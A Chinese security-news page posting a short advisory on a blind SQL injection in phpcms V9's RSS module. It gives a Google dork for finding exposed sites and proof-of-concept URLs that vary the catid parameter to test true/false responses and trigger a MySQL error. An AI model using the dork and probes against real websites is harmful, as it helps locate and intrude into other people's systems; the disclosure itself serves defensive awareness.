主页 / 网络安全 /

phpcms V9 BLind SQL 注入漏洞0day

网络安全 2021-07-03 10:02www.168986.cn网络安全知识

  影响版本:phpcms v9 blind

  官方网站:http://.phpcms.

  漏洞类型:SQL注入

  漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。

  google dork:inurl:"index.php?m=content+c=rss+catid=10"

  exploit & p0c

  [!] index.php?m=content&c=rss&catid=[valid catid]

  Example p0c

  [!] http://host/index.php?m=content&c=rss&catid=10 <= True

  [!] http://host/index.php?m=content&c=rss&catid=-10 <= False

  [+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

 

上一篇:AWBS 2.9.2 Blind SQL 注入0day 下一篇:DedeCmsV5.6 本地包含又一利用方式

网络安全培训

Copyright © 2016-2025 www.168986.cn 狼蚁网络 版权所有 Power by